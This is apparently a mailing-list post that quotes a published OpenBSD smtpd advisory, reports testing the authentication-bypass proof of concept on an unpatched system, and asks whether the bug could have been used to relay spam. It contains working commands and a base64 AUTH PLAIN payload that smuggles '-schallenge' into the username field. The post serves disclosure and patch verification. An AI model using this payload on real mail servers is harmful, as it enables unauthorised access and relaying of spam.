Hi,

from https://seclists.org/oss-sec/2019/q4/120

==============================================================================
1.2. Case study: smtpd
==============================================================================

To demonstrate how smtpd's authentication can be bypassed, we follow the
instructions from the manual page of smtpd.conf:

------------------------------------------------------------------------------
     In this second example, the aim is to permit mail delivery and
relaying only for users that can authenticate (using their normal login
     credentials).
           ...
           listen on egress tls pki mail.example.com auth
           ...
           match auth from any for any action "outbound"
------------------------------------------------------------------------------

and we restart smtpd. Then, with our remote-attacker hat on:

------------------------------------------------------------------------------
$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy

$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded
------------------------------------------------------------------------------


I did verify, that this attack worked on my unpatched OpenBSD 6.6 Box.
But I didn't get much further. After the authentication succeeded
I continued with MAIL FROM: and RCPT TO: After the RCPT TO: the
connection was aborted. After I patched my system I could no longer get
a 235 2.0.0 Authentication succeeded message

Question is: would it have been possible in the "real world" to exploit
this to relay arbitrary messages (e.g. spam)?

Regards,

Henry





Reply via email to